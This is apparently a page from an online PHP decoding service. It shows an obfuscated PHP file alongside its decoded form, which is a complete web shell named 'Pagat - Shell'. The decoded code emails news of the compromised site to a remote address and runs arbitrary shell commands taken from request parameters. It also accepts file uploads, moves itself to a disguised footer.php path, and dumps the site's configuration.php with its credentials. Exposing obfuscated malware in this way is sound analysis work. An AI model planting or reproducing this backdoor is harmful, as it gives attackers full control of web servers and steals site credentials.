Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php eval(bAsE64_DecOde(eval(gzinflate(str_rot13(base64_decode('rUl6QttVEP58VfyHzV4kJyrY..
Decoded Output download
error_reporting(0);
if (!isset($_SESSION['bajak'])) {
$visitcount = 0;
$web = $_SERVER["HTTP_HOST"];
$inj = $_SERVER["REQUEST_URI"];
$body = "ada yang inject DRUPAL
$web$inj";
$safem0de = @ini_get('safe_mode');
if (!$safem0de) {$security= "SAFE_MODE = OFF";}
else {$security= "SAFE_MODE = ON";};
$serper=gethostbyname($_SERVER['SERVER_ADDR']);
$injektor = gethostbyname($_SERVER['REMOTE_ADDR']);
mail("[email protected]", "$body","Hasil Bajakan http://$web$inj
$security
IP Server = $serper
IP Injector= $injektor");
$_SESSION['bajak'] = 0;
}
else {$_SESSION['bajak']++;};
if(isset($_GET['clone'])){
$source = $_SERVER['SCRIPT_FILENAME'];
$desti =$_SERVER['DOCUMENT_ROOT']."/images/stories/food/footer.php";
rename($source, $desti);
}
$safem0de = @ini_get('safe_mode');
if (!$safem0de) {$security= "SAFE_MODE : OFF";}
else {$security= "SAFE_MODE : ON";}
echo "<title>Pagat - Shell</title><br>";
echo "<font size=2 color=#888888><b>".$security."</b><br>";
$cur_user="(".get_current_user().")";
echo "<font size=2 color=#888888><b>User : uid=".getmyuid().$cur_user." gid=".getmygid().$cur_user."</b><br>";
echo "<font size=2 color=#888888><b>Uname : ".php_uname()."</b><br>";
function pwd() {
$cwd = getcwd();
if($u=strrpos($cwd,'/')){
if($u!=strlen($cwd)-1){
return $cwd.'/';}
else{return $cwd;};
}
elseif($u=strrpos($cwd,'\')){
if($u!=strlen($cwd)-1){
return $cwd.'\';}
else{return $cwd;};
};
}
echo '<form method="POST" action=""><font size=2 color=#888888><b>Command</b><br><input type="text" name="cmd"><input type="Submit" name="command" value="Crotz"></form>';
echo '<form enctype="multipart/form-data" action method=POST><font size=2 color=#888888><b>Upload File</b></font><br><input type=hidden name="submit"><input type=file name="userfile" size=28><br><font size=2 color=#888888><b>New name: </b></font><input type=text size=15 name="newname" class=ta><input type=submit class="bt" value="Upload Bos !!"></form>';
if(isset($_POST['submit'])){
$uploaddir = pwd();
if(!$name=$_POST['newname']){$name = $_FILES['userfile']['name'];};
move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir.$name);
if(move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir.$name)){
echo "Upload GAGAL!!!";
} else { echo "Upload Success to ".$uploaddir.$name." :P "; }
}
if(isset($_POST['command'])){
$cmd = $_POST['cmd'];
echo "<pre><font size=3 color=#000000>".shell_exec($cmd)."</font></pre>";
}
elseif(isset($_GET['cmd'])){
$comd = $_GET['cmd'];
echo "<pre><font size=3 color=#000000>".shell_exec($comd)."</font></pre>";
}
elseif(isset($_GET['rf'])){
$rf = file_get_contents("../../configuration.php");
echo $rf;
}
else { echo "<pre><font size=3 color=#000000>".shell_exec('ls -la')."</font></pre>";
}Did this file decode correctly?
Original Code
<?php
eval(bAsE64_DecOde(eval(gzinflate(str_rot13(base64_decode('rUl6QttVEP58VfyHzV4kJyrYtKc7SEBDRjAQCVUuQfoFkLWxN8m2ttfaXVBG1P/embWdl08prRohb8/rM8/MzoYrJUioay6VEdmstdc+2N4SRtJ3CK25djXDwA+CXv/q2pmwj+yTZtth//WwvdW8E02YVRaZIR2yB0HNez6BVGcYfvCH1/R8NBqE5/1gUWJELbKPG+qh///YD1Pha9grDSYyXoAFcjEjC5bNCGvwyJCT4WvQvSA3GXPAMBStNZvyZy/m4PFBcSKcAUsHhW4qcO4sy0satslQRvOoQ8IsIFjQPfXDy/6JDwH6p6f04Ov2FkI0f8bqCox5d65lrjqQZC61mSwylvLWsjCn/A67JydQYKsqnX8yRU6QHzkN/cv+yF9mV5lVTRRNIBXLXMMUa775790M5WEkRrpQqKWM7tBmplJP3nB/S1PmxuT7nkqzBbzVBd1xvQEJuLrjCKWq4yYjIO1MrqUCZI2WTeyP+l+1e1LXI4tKryxCb9qqdOjMH107RCIzjvOD46NyoSK+PhBBYzzsDVPhdu/Cv+pe+o4diph4I1V0cmjSPx5f+kqjY9jvj5xbl20icjOuPQ2QBXxCpYzxn+HKzec5DoviJdty0h1FU3qXSPzBVtp/0STtl5MEU9FcEm11hFb40YDNmCG7JJjzJDn0V+HhUR1uAZXlR8J20+IL77whkVmgW3+/tR8wPKLuMp1YD73J0rkJwrCAc2p1i7pDXQgCoMRLbqvt0vZYZozBAfAXIu7YVekCHiHCMoVYyXmlnH2vXIf1onzYN1VVsZNubrvY3gwzLbLICJmR/B6SEZyt6D4uQk2EomUSm1JUG6VlqVuo32Q8xw6iSDVDl/DMqtq7r0ShuClHU0PigmTd1Ic1uZ3yV/5HipubX8kB1j9BRSVPyhygWaUkxVICWQ9jwRJzOehDbfQ8occyWkwW1wQeiiwvDDGLnGqo4Z8NJchkh1N2WTe1TjFWxVdfxqHkjiUFvB8rdr6Ah4fYjpyDWqwcTXGDpFJvUc6UsWm7MTOsxl4XhPX8pIhknlUWk0aRY1uIh9aP6pmLOOZMhUqX6DcMpuBfqWQ68ZVJOd+W0Z5SZMXvrfc+TAexFh/5LL1f/1vlyfg9PkMSJVnrjm4bDiXIV1Qnc8lhSPB7qVajscHy2o5S4q6dMlO9cgvrGAtc9/nqMDSaFkHtRqECpwersFsZ12Nj7dTMOLdgdI3sQKbyjodyZx6HddBt0sWkbEu6wdZdomR6mgrMHwmF1ZYLpeLqrHvWvXUAW2tlVbmOyYZSQ1ER15oYELnfB4Q9tj8g9IB8tQfvEc3V/Nc8w2SxpEjKNLaXSrXhZcXXVOmfbZT27Af2tsaVH/LPPHduJLvgynby0JdheZnNKzVdTpAVhpXiaiHIX8KgpjUENQUA2K7QXjLgDZeMhjvH9eAP3qdvSSiGp93ezO0aIGuu/6Igv4HaVjTZWpjzJPBi'))))));
?>Function Calls
| gzinflate | 1 |
| str_rot13 | 1 |
| bAsE64_DecOde | 1 |
| base64_decode | 1 |
Stats
| MD5 | 09441b9d2de94fce0846580886adbd47 |
| Eval Count | 1 |
| Decode Time | 86 ms |